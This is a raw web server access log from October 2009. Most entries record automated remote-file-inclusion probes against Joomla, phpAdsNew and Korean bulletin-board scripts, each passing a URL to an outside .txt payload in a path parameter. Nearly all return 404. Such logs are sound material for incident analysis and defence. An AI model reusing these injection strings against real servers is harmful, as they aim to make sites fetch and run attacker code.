72.11.145.8 - - [15/Oct/2009:23:03:31 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:31 -0500] "GET /logs/access_log.1234137600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:32 -0500] "GET /logs/access_log.1235865600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:44 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:44 -0500] "GET /logs/access_log.1234137600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:49 -0500] "GET /logs/access_log.1236643200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:49 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:52 -0500] "GET /logs/access_log.1236643200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:03:52 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:04:10 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:04:11 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:04:15 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 94061 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:04:17 -0500] "GET /logs/access_log.1235865600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.55.207.50 - - [15/Oct/2009:23:04:32 -0500] "GET /logs/access_log HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.11.145.8 - - [15/Oct/2009:23:04:35 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:05:24 -0500] "GET /logs/access_log.1237334400///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:05:30 -0500] "GET /logs/access_log.1237334400///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.55.207.78 - - [15/Oct/2009:23:05:31 -0500] "GET /logs/access_log.1205798400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.94.201.138 - - [15/Oct/2009:23:05:48 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:05:48 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:05:48 -0500] "GET /logs/access_log.1250985600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:05:53 -0500] "GET /logs/access_log.1250985600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:05:53 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:05:53 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:05:53 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:05:53 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:05:53 -0500] "GET /logs/access_log.1250985600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:05:56 -0500] "GET /logs/access_log.1250553600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
67.205.52.23 - - [15/Oct/2009:23:06:02 -0500] "GET //view.inc.php?phpAds_path=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 296 "-""-"
67.205.52.23 - - [15/Oct/2009:23:06:02 -0500] "GET /logs//view.inc.php?phpAds_path=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 301 "-""-"
94.102.6.154 - - [15/Oct/2009:23:06:02 -0500] "GET /logs/access_log.1250553600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:06:03 -0500] "GET /logs/access_log.1250553600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:07:02 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:07:02 -0500] "GET /logs/access_log.1250553600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:07:02 -0500] "GET /logs/access_log.1251331200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:07:02 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:07:02 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:07:02 -0500] "GET /logs/access_log.1252108800//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:07:06 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:07:16 -0500] "GET /logs/access_log.1241827200//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:07:25 -0500] "GET /encapscms_PATH/core/core.php?root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:07:25 -0500] "GET /logs/access_log.1252108800/encapscms_PATH/core/core.php?root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:07:25 -0500] "GET /logs/encapscms_PATH/core/core.php?root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:07:25 -0500] "GET /logs/access_log.1250035200/encapscms_PATH/core/core.php?root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:07:28 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:07:28 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:07:28 -0500] "GET /logs/access_log.1251331200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:07:28 -0500] "GET /logs/access_log.1250553600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
65.55.106.187 - - [15/Oct/2009:23:07:32 -0500] "GET /logs/access_log.1117670400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
128.125.169.162 - - [15/Oct/2009:23:07:44 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://worldboii.webspacemania.com/avatars/x1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:07:50 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://worldboii.webspacemania.com/avatars/x1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:07:50 -0500] "GET /logs/access_log.1239580800/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://worldboii.webspacemania.com/avatars/x1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
147.46.116.207 - - [15/Oct/2009:23:09:55 -0500] "GET /logs/access_log.1250553600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
65.55.106.182 - - [15/Oct/2009:23:10:01 -0500] "GET /logs/access_log.1155254400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.11.145.8 - - [15/Oct/2009:23:10:24 -0500] "GET /logs/access_log.1241049600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:10:25 -0500] "GET /logs/access_log.1236729600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:10:55 -0500] "GET /logs/access_log.1241049600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:10:55 -0500] "GET /logs/access_log.1236729600///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:12:22 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:12:22 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:12:22 -0500] "GET /logs/access_log.1251244800/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:12:32 -0500] "GET /logs/access_log.1251849600/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:12:44 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:12:59 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:12:59 -0500] "GET /logs/access_log.1251244800/joomla/index.php?option=com_restaurante&task=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:12:59 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:13:09 -0500] "GET /logs/access_log.1251244800/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:13:09 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:13:09 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:13:09 -0500] "GET /logs/access_log.1251849600/joomla/index.php?option=com_restaurante&task=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:13:20 -0500] "GET /logs/access_log.1251849600/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:13:22 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:13:32 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:14:00 -0500] "GET /logs/index.php?ort=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:14:00 -0500] "GET /index.php?ort=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:14:00 -0500] "GET /logs/access_log.1248220800/index.php?ort=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:42 -0500] "GET //bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:43 -0500] "GET /logs//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:43 -0500] "GET /logs/access_log.1251763200//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:50 -0500] "GET //bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:51 -0500] "GET /logs//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:51 -0500] "GET /logs/access_log.1252713600//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:54 -0500] "GET //bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:54 -0500] "GET /logs//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:54 -0500] "GET /logs/access_log.1251763200//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:56 -0500] "GET //bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:56 -0500] "GET /logs//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:56 -0500] "GET /logs/access_log.1251763200//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:56 -0500] "GET //bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:56 -0500] "GET /logs//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:14:56 -0500] "GET /logs/access_log.1252713600//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:00 -0500] "GET //bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:01 -0500] "GET /logs/access_log.1251763200//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.27.203.107 - - [15/Oct/2009:23:15:01 -0500] "GET //skin/uks_qnaboard_v2010/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.27.203.107 - - [15/Oct/2009:23:15:01 -0500] "GET /logs//skin/uks_qnaboard_v2010/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:01 -0500] "GET /logs//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.27.203.107 - - [15/Oct/2009:23:15:04 -0500] "GET /logs/access_log.1250121600//skin/uks_qnaboard_v2010/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:16 -0500] "GET /logs/access_log.1252972800//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:17 -0500] "GET /logs/access_log.1252713600//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:20 -0500] "GET /logs/access_log.1252972800//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:22 -0500] "GET /logs/access_log.1252972800//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:22 -0500] "GET /logs/access_log.1252713600//bbs/board.php?bo_table=http://www.smokin57.com/public_html//modules/Forums/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.100.181.217 - - [15/Oct/2009:23:15:30 -0500] "GET /logs/access_log.1252713600//bbs/board.php?bo_table=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:15:32 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:15:32 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [15/Oct/2009:23:15:35 -0500] "GET /logs/access_log.1250208000//skin/uks_qnaboard_v2010/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:15:39 -0500] "GET /logs/access_log.1252108800//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:15:39 -0500] "GET /logs/access_log.1241827200//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.207.78 - - [15/Oct/2009:23:18:32 -0500] "GET /logs/access_log.1160697600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.129.64.174 - - [15/Oct/2009:23:19:21 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:19:24 -0500] "GET /logs/access_log.1252108800//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:19:24 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.129.64.174 - - [15/Oct/2009:23:19:33 -0500] "GET /logs/access_log.1241827200//index.php?_SERVER[DOCUMENT_ROOT]=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.107.179 - - [15/Oct/2009:23:20:32 -0500] "GET /logs/access_log.1238112000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.148.98 - - [15/Oct/2009:23:22:09 -0500] "GET /logs/access_log.1249603200////skin/ggambo7002_board/comment_modify.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [15/Oct/2009:23:22:09 -0500] "GET /logs/access_log.1251676800////skin/ggambo7002_board/comment_modify.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [15/Oct/2009:23:22:09 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.133.148.98 - - [15/Oct/2009:23:22:09 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
65.55.51.111 - - [15/Oct/2009:23:22:23 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.111 - - [15/Oct/2009:23:23:38 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.50.138.115 - - [15/Oct/2009:23:25:49 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 334 "-""Mozilla/5.0"
61.50.138.115 - - [15/Oct/2009:23:25:49 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.50.138.115 - - [15/Oct/2009:23:25:49 -0500] "GET /logs/access_log.1251331200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 361 "-""Mozilla/5.0"
61.50.138.115 - - [15/Oct/2009:23:25:56 -0500] "GET /logs/access_log.1244851200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 361 "-""Mozilla/5.0"
